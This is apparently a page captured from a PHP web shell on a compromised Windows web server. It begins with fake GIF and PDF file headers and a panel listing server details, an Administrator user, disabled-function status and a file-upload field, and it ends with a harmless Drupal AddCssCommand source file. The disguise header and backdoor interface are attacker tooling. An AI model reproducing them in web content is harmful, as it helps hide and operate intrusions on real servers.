GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Ajax/ |
Upload File : |
<?php namespace Drupal\Core\Ajax; /** * An AJAX command for adding css to the page via ajax. * * This command is implemented by Drupal.AjaxCommands.prototype.add_css() * defined in misc/ajax.js. * * @see misc/ajax.js * * @ingroup ajax */ class AddCssCommand implements CommandInterface { /** * A string that contains the styles to be added to the page. * * It should include the wrapping style tag. * * @var string */ protected $styles; /** * Constructs an AddCssCommand. * * @param string $styles * A string that contains the styles to be added to the page, including the * wrapping <style> tag. */ public function __construct($styles) { $this->styles = $styles; } /** * Implements Drupal\Core\Ajax\CommandInterface:render(). */ public function render() { return [ 'command' => 'add_css', 'data' => $this->styles, ]; } }